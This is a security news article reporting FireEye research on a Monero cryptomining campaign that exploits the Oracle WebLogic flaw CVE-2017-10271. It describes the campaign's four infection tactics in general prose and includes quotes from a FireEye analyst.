A malicious campaign that’s been exploiting a vulnerability in Oracle’s WebLogic application servers in order to install a Monero cryptominer on victims’ machines has reportedly used at least four different infection chain tactics to spread the threat worldwide, across virtually all industry sectors.
The campaign has already impacted organizations in the U.S., Australia, Hong Kong, India, Malaysia, the U.K., and Spain, according to a Feb. 15 blog post authored by FireEye researchers Rakesh Sharma, Akhil Reddy, and Kimberly Goody.
The bug, CVE-2017-10271, is a remote code execution bug that also affects PeopleSoft HR and Oracle E-Business Suite software. And while it was patched late last year, server owners who have failed to implement it remain vulnerable to the exploit, which FireEye reports can result in a cryptominer infection, executed via one of at least four separately observed tactics.
One method uses PowerShell to download the miner directly onto a victimized system, and ShellExecute to execute the program. Alternatively, the exploit can deliver a PowerShell script that downloads the miner from a remote server. For machines operating on Linux OS, there is another possibility: the exploit may deliver shell scripts that download and execute the cryptominer. And a fourth tactic utilizes dumped Windows credentials, the credentials-extracting tool Mimikatz, and the EternalBlue Windows SMB server exploit to spread laterally.
The campaign appears to be similar to one that was reported last month by Morphus Labs’ Chief Research Officer Renato Marinho and SANS Technology Institute Dean of Research Johannes Ullrich, who said the same Oracle bug was used to deliver the XMRig cryptominer.
“There were multiple campaigns that leveraged the CVE-2017-10271 to subsequently distribute cryptocurrency miners. In this sense, [our blog post] wasn’t specific to a singular campaign, but rather a more cohesive look at the different tactics that we observed following exploitation of that vulnerability,” said FireEye senior analyst Kimberly Goody in an email interview today with SC Media. “With that said, based on a quick review of the indicators in the SANS blog, those campaigns appear to be different from activity sets that we were specifically referring to. We still are observing threat actors leverage CVE-2017-10271 to subsequently download cryptocurrency mining payloads as of a few hours ago.”